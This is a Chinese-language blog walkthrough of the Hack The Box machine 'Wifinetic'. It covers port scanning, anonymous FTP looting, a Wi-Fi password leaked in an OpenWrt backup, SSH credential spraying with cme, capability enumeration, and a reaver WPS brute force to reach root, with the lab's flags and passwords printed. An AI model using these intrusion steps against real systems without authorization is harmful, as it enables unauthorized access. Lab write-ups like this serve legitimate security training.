
2023091801.jpg
靶场信息
- https://app.hackthebox.com/machines/Wifinetic
- 10.10.11.247

image.png
信息搜集
使用nmap对靶场进行端口扫描
1 | nmap -sC -sV -Pn 10.10.11.247 |
开放的 TCP 端口:FTP (21)、SSH (22) 和 DNS (53)
- 21端口开放的ftp服务
- 22端口开放ssh服务,主机是ubuntu 20.04 focus
- 53端口开放open vnp

image.png
漏洞利用
FTP-TCP 21
namp扫描得知ftp服务可以使用Anonymous登入ftp服务存在5个文件

image.png
下载5个文件
1 | mkdir ftp |

image.png
可以看到3个pdf,1个txt,1个rar压缩包

image.png
分别查看pdf
发现有其中泄露了俩个用户名
1 | samantha.wood93 |

image.png

image.png
查看txt无发现

image.png
解压查看rar压缩包
1 | tar -xvf backup-OpenWrt-2023-07-26.tar |

image.png

image.png
查看一下passd,无发现

image.png
config是一个配置文件目录对其查看其中文件发现wifi密码

image.png
使用ssh对其进行尝试登入
1 | cme ssh 10.10.11.247 -u user.txt -p 'VeRyUniUqWiFIPasswrd1!' |

image.png
1 | ssh [email protected] |
ssh登入成功

image.png
flag1
拿到user权限的flag文件
1 | id |

image.png
1 | 2471dee96e082bd5df93c2dee9a1d038 |
权限提升
1.其他用户的主目录位于/home,netadmin用户无法访问这些目录

image.png
2./opt的 share与 FTP 上可用的目录相同

image.png
- 查找有suid属性权限的文件
1
2find / -perm -4000 -or -perm -2000 2>/dev/null
find / -perm -u=s -type f 2>/dev/nullimage.png - capabilities 提权
1
getcap -r / 2>/dev/null
image.png
1 | reaver使用文档 |
iw dev
将提供有关无线接口的更多信息

image.png
使用刚刚发现的工具对其进行爆破
1 | reaver |

image.png
破解成功
1 | WhatIsRealAnDWhAtIsNot51121! |

image.png
1 | su - |

image.png
flag2
1 | ls |

image.png
参考链接
https://0xdf.gitlab.io/2023/09/16/htb-wifinetic.html#background-1
申明:
本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.